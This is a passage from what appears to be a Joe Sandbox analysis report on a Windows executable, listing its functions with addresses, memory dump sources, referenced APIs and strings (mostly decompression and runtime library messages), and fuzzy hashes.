                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D118E32B14F028AEB00CF65E8542B837A4FB59B6CF240E35DA2D867A5DFBCD1948340
                                                                                                                                                                                                                            Function 00007FF6029B2990 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                            • Opcode ID: d90441c8661e5c6fa34eff5dbe8e25492f192de097943eb307aa0e87c9fb1e72
                                                                                                                                                                                                                            • Instruction ID: 46c28dc9fc80b964fc3f4fa8fcbb7d1b83a96bb6d507be7af55739bef80da770
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d90441c8661e5c6fa34eff5dbe8e25492f192de097943eb307aa0e87c9fb1e72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6C10672B1828687E725CF17A14466ABB91FB84B88F648135DF4E83785DF7DE801CB40
                                                                                                                                                                                                                            Function 00007FF6029994FB Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                            • API String ID: 0-1127688429
                                                                                                                                                                                                                            • Opcode ID: 4dc8512611bc38712c0a70c769346940f3f81a1d31e568b8746cdea38bafbf0a
                                                                                                                                                                                                                            • Instruction ID: 96a606fd9bc475660db3c34ef580560c1fbeac6c74a9ab78e946f382ff1ba8ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dc8512611bc38712c0a70c769346940f3f81a1d31e568b8746cdea38bafbf0a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F19D72A182C58FF7A58F1EC088A3A3EA9FF45758F25453CDA4986792CFB8E550C740
                                                                                                                                                                                                                            Function 00007FF6029B8788 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                                            • Opcode ID: cb592c48bd29cba42889b287172e36f63e22e9bf4f9fc8b2089a15a6dc159fb1
                                                                                                                                                                                                                            • Instruction ID: 1171abed63db55aafe7817b322813b71e7dd35981f02a0b023706cfb6607fcac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb592c48bd29cba42889b287172e36f63e22e9bf4f9fc8b2089a15a6dc159fb1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BB16D77A04B898BEB16CF2AC94636C7BA4FB48B4CF248921DA5D837A5CF79D451C700
                                                                                                                                                                                                                            Function 00007FF6029A2A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                            • API String ID: 0-227171996
                                                                                                                                                                                                                            • Opcode ID: 6dbc70c0dca08d9b656c7735a6a4a4fa3aabd5a67dda5cc9f8415ca9b31e3f39
                                                                                                                                                                                                                            • Instruction ID: 21d46c7fa8eb8f80f00bdb9154351faa4a2327c5b93bce6bf059df73d613ba39
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dbc70c0dca08d9b656c7735a6a4a4fa3aabd5a67dda5cc9f8415ca9b31e3f39
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEE18132E0974686EB688F2A855013D3BA0FF45B4CF345139DE4E87696DFB9E852C780
                                                                                                                                                                                                                            Function 00007FF60299935B Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                            • API String ID: 0-900081337
                                                                                                                                                                                                                            • Opcode ID: b0bb3ba3b08e784ccd327ff8f270a1eef599d18a62587763c1132d4e6c57b8cc
                                                                                                                                                                                                                            • Instruction ID: 2b78a071113c8bd11bac619fd08b25d58def5fa01e619ec2a18ac093a2adf5b7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0bb3ba3b08e784ccd327ff8f270a1eef599d18a62587763c1132d4e6c57b8cc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8918572A182D58FF7A58B1EC448A3E3EA9FF45368F254139DA4E866C1DF78E550CB00
                                                                                                                                                                                                                            Function 00007FF6029ACD70 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                            • Opcode ID: 6648ef9757360aad6879d7405335c0c647b8ac8d07c77cc9935de7d10fbee65f
                                                                                                                                                                                                                            • Instruction ID: 926f6891620dd2813ea08b66002640da4874975cc7ddf659bb7ceb489487bd18
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6648ef9757360aad6879d7405335c0c647b8ac8d07c77cc9935de7d10fbee65f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F514C62F183C146E7258E3A98047697F91FB44B98F688232CB6C8BBC6CFBDD4448740
                                                                                                                                                                                                                            Function 00007FF6029AC8DC Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                            • Opcode ID: db65c2e24819ee5449cb2ee8502b6ed44ef7f2c72c470634139f3a022e8e6725
                                                                                                                                                                                                                            • Instruction ID: 74527a20d576653a519a872997adc78986a73ee9f1f5060be648af629ba8809f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db65c2e24819ee5449cb2ee8502b6ed44ef7f2c72c470634139f3a022e8e6725
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3A13862E097C586EB21CF2AA4007B97B90EF54788F258132DE9D8B792DE7DE501C781
                                                                                                                                                                                                                            Function 00007FF6029A7614 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: TMP
                                                                                                                                                                                                                            • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                            • Opcode ID: d5216588d7721c6c5d5cc6a15e3a34025301d3d4e7026a2c1b0e95081c70090a
                                                                                                                                                                                                                            • Instruction ID: 71d832343f2c93f9d4e26021f67bd445dbe8bcf4bc780dc2ea9858f340e633e2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5216588d7721c6c5d5cc6a15e3a34025301d3d4e7026a2c1b0e95081c70090a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3551A011F0870241FB64AB6B59166FE9A906F80BCCF784435DE0EC7797EEBCE4528284
                                                                                                                                                                                                                            Function 00007FF6029B2200 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                            • Opcode ID: 50926de21a62eb0e62f59067c1cec7a890c0bc42addb7784677d7361206fbd01
                                                                                                                                                                                                                            • Instruction ID: 66973e00e644139d263fbe922377142e4713b9d31890a19e7c31e1750a788ee6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50926de21a62eb0e62f59067c1cec7a890c0bc42addb7784677d7361206fbd01
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DB09224E17A02C2EA492B126C8221426A8BF58704FA54038C14C82321EE7C20A55700
                                                                                                                                                                                                                            Function 00007FF6029A2610 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e97760ef2f0f27e6e41dd14eb96ba7b86864cbb2462ce715eee1b26c47385252
                                                                                                                                                                                                                            • Instruction ID: aa9ee0870b07a572342357397903b1c72ee6166e61076e5849e1e0190da6b98c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e97760ef2f0f27e6e41dd14eb96ba7b86864cbb2462ce715eee1b26c47385252
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01D19C26E0874286EB688B2BC55427D2BA0FF45B4CF344236CE4D97696DFBDE941C780
                                                                                                                                                                                                                            Function 00007FF602998880 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ab5d213824f7e823fcb9f06f9116d7a62794940140ecc1176a7fc8acd5ff97c0
                                                                                                                                                                                                                            • Instruction ID: b41812147002a18979f9bfb3f52e46b56d2b10deec2029c7d725776cc193c592
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab5d213824f7e823fcb9f06f9116d7a62794940140ecc1176a7fc8acd5ff97c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6C1B9B26141E04BE289EB29E45987A77D1FB8931DBD4802BEB8787786CF3CE414D750
                                                                                                                                                                                                                            Function 00007FF6029A1C80 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 6218cc0bda4eb7707580a64e53a188d69c6215afaf53f0fd73f8d81d30a51f6e
                                                                                                                                                                                                                            • Instruction ID: 3babf0ad01212c0adb8aca6e7b7c9f9a5e8e13ae848e9e0dd0677f8595fa67b0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6218cc0bda4eb7707580a64e53a188d69c6215afaf53f0fd73f8d81d30a51f6e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31B14A72E0879589EB658F2AC05426C3FA4EF49B4CF784235DA4E87396CFB9D441C784
                                                                                                                                                                                                                            Function 00007FF6029AD3F0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1be5a8a0786b7b5028e9cbb4f5ad717a4c3682dd4b7f38bd115ce9522b6f59bd
                                                                                                                                                                                                                            • Instruction ID: 2a3fa01746a05d17840b94da1ef24cc91afb3fbce942160c27c17e8c9be5fc01
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1be5a8a0786b7b5028e9cbb4f5ad717a4c3682dd4b7f38bd115ce9522b6f59bd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A81C172E0C78146EB74CF2A944037A6E91FF89798F604235DA8D87F9ACE7DE5408B50
                                                                                                                                                                                                                            Function 00007FF6029B5480 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 7f316b75b052e126dea546533144c62575de451f153120a8ff292f111315de16
                                                                                                                                                                                                                            • Instruction ID: b6df5401b62c5dd48a90c09d9f6c656ffe807b33357584b01d02c4a02d9706fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f316b75b052e126dea546533144c62575de451f153120a8ff292f111315de16
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1461E922F0C28286F766993A855027D6E91BF50778FB64639D61EC66C7DEFDE8008740
                                                                                                                                                                                                                            Function 00007FF6029A11D4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                            • Instruction ID: 800e5fc225092d08f03f55086ec21249f01bab7dd975b92a58fe025ddc449f1c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46514276E1875186EB648F2AC0442283BA5EF55B6CF344131CE4D977D6CF7AE852CB80
                                                                                                                                                                                                                            Function 00007FF6029A09B4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
